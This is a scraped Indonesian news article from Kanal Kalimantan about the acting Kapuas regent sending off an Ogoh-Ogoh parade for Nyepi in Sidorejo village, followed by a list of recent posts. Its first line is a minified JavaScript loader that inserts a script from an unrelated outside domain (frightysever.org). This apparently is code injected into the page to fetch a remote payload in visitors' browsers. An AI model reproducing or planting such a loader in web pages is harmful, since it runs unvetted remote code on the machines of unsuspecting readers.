(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Kapuas

Ogoh-Ogoh Merangkai Hari Suci Nyepi di Desa Sidorejo


KANALKALIMANTAN.COM, KUALA KAPUAS – Penjabat (Pj) Bupati Kapuas Erlin Hardi melepas arak-arakan Ogoh-Ogoh menyambut Hari Suci Nyepi Tahun Baru Saka 1946 di Desa Sidorejo, Kecamatan Tamban Catur, Kabupaten Kapuas, Minggu (10/3/2024) siang.

Turut hadir mendampingi pada kegiatan tersebut Sekretaris Daerah Kabupaten Kapuas Septedy, Pj Ketua TP PKK Kabupaten Kapuas Agustina Erlin Hardi, Kejari Kapuas Luthcas Rohman, Camat Tamban Catur Rustamaji, serta pejabat Pemkab Kapuas.

Pj Bupati Kapuas Erlin Hardi mengatakan, Hari Raya Nyepi pada tahun ini merupakan salah satu acara untuk mengajak seluruh umat Hindu saling menghormati dan saling menghargai sesama baik antara agama, suku maupun pemerintah.

Baca juga: Tangan Jahil Perusak Fasum di Banjarmasin, Enam Besi Pembatas Trotoar Jalan Hasanuddin HM Dicuri

“Hari Raya Nyepi ini juga menjadi sarana untuk memaknai kehidupan yang lebih berarti, serta menjaga kesucian rohani menuju jalan yang benar, berdasarkan dharma dan falsafah Tri Hita Karana,” ucap Erlin.

Erlin Hardi juga mengatakan, penyegaran dan pencerahan amat penting bagi umat hindu dalam upaya untuk terus menjunjung tinggi kedamaian, ketentraman, toleransi, dan harmoni dalam kehidupan.

“Kedamaian, toleransi dan harmoni juga perlu terus kita pelihara, kita hidupkan dan kita segarkan di tengah kehidupan masyarakat yang sangat majemuk,” kata Erlin.

Baca juga: Ini Harapan Pj Kades Warna Sari ke Pemkab Kapuas

Dirinya mengucapkan terima kasih kepada warga Hindu yang sudah ikut berperan memelihara ketertiban dan kedamaian di Kabupaten Kapuas, sehingga dapat dirasakan begitu rukun, damai satu sama lain.

“Mari kita pelihara ini selamanya, dengan kebersamaan kita melangkah bersama agar bagaimana masyarakat menjadi maju, sejahtera, rukun, dan damai,” pungkas Erlin Hardi.

Sementara itu, Ketua Parisada Hindu Darma Indonesia (PHDI) Kecamatan Tamban Catur, Wayan Latre mengatakan, kegiatan ini untuk rangkaian Hari Raya Nyepi sekaligus kehadiran Pj Bupati menyambut dan melepas Ogoh- goh.

Baca juga: Berbeda Awal Puasa, Menag Minta Saling Menghormati

“Karena Ogoh-Ogoh ini merupakan salah satu simbol dari alam semesta, karnea Hari Raya Nyepi ini ada rangkaian-rangkaiannya yaitu Melati dan Tawur Kesanga,” kata Wayan Latre.

“Saya mewakili umat Hindu Darma di Desa Sidorejo sangat mengucapkan terima kasih yang sebesar-besarnya kepada bapak Erlin Hardi beserta rombongan yang telah hadir ke Desa Sidorejo ini,” ucapnya. (Kanalkalimantan.com/ags)

Reporter: ags
Editor: kk


Muhammad Andi

Recent Posts

Kicau Mania Ramaikan Kapolresta Banjarmasin Cup 2024

KANALKALIMANTAN.COM, BANJARMASIN - Kepolisian Resor (Polres) Kota Banjarmasin menggelar lomba Burung Berkicau, Minggu (19/5/2024) siang,… Read More

7 menit ago

Pastikan Listrik Tanpa Kedip KTT WWF 2024 Bali

KANALKALIMANTAN.COM, DENPASAR - PT PLN (Persero) siap menghadirkan listrik yang andal untuk mendukung penyelenggaraan Konferensi… Read More

1 jam ago

Santri TK Al Quran di Kabupaten Banjar Ikuti Munaqasah

KANALKALIMANTAN.COM, MARTAPURA -  Santri TK Al Quran se-Kabupaten Banjar mengikuti Munaqasah yang digelar Badan Komunikasi… Read More

1 jam ago

Jelang Pilwali Banjarbaru, Nurkhalis: Masih Lihat Peta Peluang Koalisi

KANALKALIMANTAN.COM, BANJARBARU - Peta koalisi partai politik jelang Pilkada 2024 di Kota Banjarbaru Kalimantan Selatan… Read More

3 jam ago

Daftar Bareng Aditya-Yuti, Koalisi “AYUHA” PPP-Gerindra di Pilwali Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Teka-teki maju atau tidaknya Aditya Mufti Ariffin mulai terjawab, bahkan siapa calon… Read More

4 jam ago

Manis Cuan Pokmas Madu Kelulut Berkat Bersatu dari Program RT Mandiri

KANALKALIMANTAN.COM, BANJARBARU – Berawal dari temuan sarang kelulut di dalam pondasi rumah tinggal warga, muncul… Read More

6 jam ago

This website uses cookies.